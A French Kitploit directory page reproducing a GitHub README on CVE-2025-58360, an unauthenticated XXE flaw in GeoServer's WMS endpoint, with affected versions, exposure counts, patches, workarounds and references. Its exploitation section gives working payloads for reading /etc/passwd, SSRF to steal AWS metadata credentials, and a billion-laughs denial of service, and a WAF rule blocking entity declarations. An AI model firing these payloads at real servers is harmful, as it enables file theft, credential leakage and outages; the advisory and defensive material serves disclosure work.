Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Outils/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔓 🛰️ « CVE-2025-58360 » L'endpoint WMS de GeoServer vulnérable à une attaque XXE 🌟

GeoServer

🏷️ Informations de base

  • CVE ID : CVE-2025-58360
  • Publié : 📅 25 novembre 2025
  • Dernière modification : 📅 25 novembre 2025 (encore tout frais au 26 nov.)
  • Type de vulnérabilité : XML External Entity (XXE) – CWE-611
  • Logiciel concerné : GeoServer (serveur géospatial open source écrit en Java)
  • Sévérité : 🔥 Élevée – Score de base CVSS v3.1 7.5
    • Vecteur : AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Exploitation dans la nature : 🟡 Pas encore observée (26 nov. 2025) – mais des PoC publics circulent
  • Authentification requise : ❌ Aucune – entièrement non authentifié
  • Interaction utilisateur requise : ❌ Aucune

🎨 Ce qui rend ce bug spécial (et dangereux)

Il s'agit d'un XXE classique mais dévastateur dans l'endpoint GetMap du Web Map Service (WMS).
Les attaquants peuvent :

  • 📂 Lire n'importe quel fichier auquel le processus GeoServer a accès (/etc/passwd, geoserver.xml, clés privées, etc.)
  • 🌐 Effectuer une Server-Side Request Forgery (SSRF) pour scanner les réseaux internes ou atteindre des endpoints de métadonnées (p. ex. AWS/GCP)
  • 💣 Déclencher un déni de service avec des attaques par expansion d'entités (« billion laughs »)
  • 🔗 Potentiellement chaîner avec d'autres failles pour un RCE complet (pas direct, mais possible dans des configurations mal sécurisées)

🛡️ Versions affectées (tableau détaillé)

🌍 Exposition mondiale (en temps réel au 26 nov. 2025)

→ Cela représente des dizaines de milliers de serveurs potentiellement vulnérables exposés sur Internet en ce moment même ! 🌐

🧨 Procédure technique complète d'exploitation

Endpoint : POST /geoserver/wms
Paramètre clé : SLD_BODY (permet un style XML brut)
Chemin de code vulnérable : L'analyseur XML ne désactive pas la résolution des entités externes → XXE classique.

f77f64d7c92fd31b29d537f5205da524

Exemple 1 – Divulgation de fichiers (/etc/passwd)

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ La réponse contient le contenu de /etc/passwd 🎉

Exemple 2 – SSRF vers des métadonnées internes (exemple AWS)

root@kitploit:~
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ Fuit des identifiants AWS temporaires si exécuté sur EC2.

Exemple 3 – Déni de service Billion Laughs

root@kitploit:~
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>

→ Consomme des gigaoctets de RAM en quelques secondes 💥

🛠️ Correctifs officiels et téléchargements

VersionDate de publicationLien de téléchargement
2.27.025 nov. 2025https://geoserver.org/release/stable/

Utilisateurs de Docker :

root@kitploit:~
docker pull osgeo/geoserver:2.27.0

🔧 Contournements (si vous ne pouvez pas patcher immédiatement)

  1. Bloquez les XML dangereux avec une règle WAF/mod_security :
    Refusez les requêtes contenant <!ENTITY ou SYSTEM "file://
  2. Désactivez le paramètre SLD_BODY globalement (si non nécessaire)
  3. Exécutez GeoServer avec un système de fichiers en lecture seule + supprimez les capacités
  4. Placez-le derrière un proxy inverse qui supprime les corps XML pour les utilisateurs non authentifiés

📢 Références officielles et PoC

  • Entrée NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • Avis GeoServer : https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • Ticket JIRA : https://osgeo-org.atlassian.net/browse/GEOS-11682
  • PoC public sûr (Python) : https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • Modèle Nuclei (détection automatique) : Déjà fusionné dans la branche principale

⏰ Chronologie

DateÉvénement
Avant nov. 2025Découvert de manière autonome par le scanner IA XBOW
25 nov. 2025Divulgation coordonnée → correctifs publiés
25 nov. 2025CVE attribuée et publiée
26 nov. 2025Les PoC deviennent viraux, les scans d'exposition explosent

✨ Derniers mots

C'est un XXE de manuel qui frappe une plateforme géospatiale largement déployée avec des dizaines de milliers d'instances exposées sur Internet.
Les correctifs sont sortis le jour même de la divulgation — un immense bravo à l'équipe GeoServer pour sa réactivité ! 🏆
Mais la fenêtre entre la disponibilité des correctifs et l'exploitation massive se réduit rapidement.

Si vous utilisez GeoServer → mettez à jour dès aujourd'hui.
Ne devenez pas le prochain gros titre.

Restez sécurisé, restez brillant ! 🛡️✨

Télécharger l’outil
ComposantVersions vulnérablesCorrigé dansStatut
GeoServer autonome2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 Vulnérable
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 Vulnérable
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Vulnérable
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Vulnérable
GeoServer 2.27.x et plus récent–Déjà corrigé✅ Sûr
SourceInstances exposéesNotes
ZoomEye~49,400recherche app:"GeoServer"
FOFA~24,000Résultats de l'année écoulée
Shodan~31,000Port 8080 + correspondance de titre
GobySec~20,000Scan du réseau public
2.26.325 nov. 2025Correctif de la branche de maintenance
2.25.625 nov. 2025Branche supportée plus ancienne